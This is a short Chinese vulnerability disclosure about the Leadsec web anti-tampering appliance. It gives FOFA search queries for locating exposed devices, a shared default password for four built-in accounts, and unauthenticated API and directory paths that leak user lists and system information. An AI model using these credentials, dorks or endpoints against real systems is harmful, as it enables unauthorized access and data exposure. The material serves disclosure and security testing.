网御星云-网页防篡改系统多个漏洞-棉花糖会员站

# 网御星云-网页防篡改系统多个漏洞

## 漏洞描述

网御星云网页防篡改系统，没啥好介绍的都懂，就是网页被篡改后能自动恢复的设备，存在弱口令，未授权信息泄露，遍历等漏洞。

## 漏洞影响

> 网御星云网页防篡改系统

## FOFA

> title = “网御web应用安全防护系统v3.0”
>
> title = “网页防篡改系统”

## 漏洞复现

###弱口令：

super(超级管理员)

admin(系统管理员)

operator(操作员)

viewer(审查员)

密码都是：Admin%100

###未授权信息泄露：

####报错界面暴露接口地址

“`
URL+/API/
“`

![1](/static/qingy/网御星云-网页防篡改系统多个漏洞/img/1.png)

####账号信息泄露

“`
URL+/API/user/list
“`

![2](/static/qingy/网御星云-网页防篡改系统多个漏洞/img/2.png)

####系统信息泄露

“`
URL+/API/system_info/list
“`

![3](/static/qingy/网御星云-网页防篡改系统多个漏洞/img/3.png)

####还可以进行目录遍历：

“`
URL+/doc/
URL+/images/
URL+/audio/
URL+/fonts/
“`

![4](/static/qingy/网御星云-网页防篡改系统多个漏洞/img/4.png)

文章版权归作者所有，未经允许请勿转载。

THE END

网御星云-网页防篡改系统多个漏洞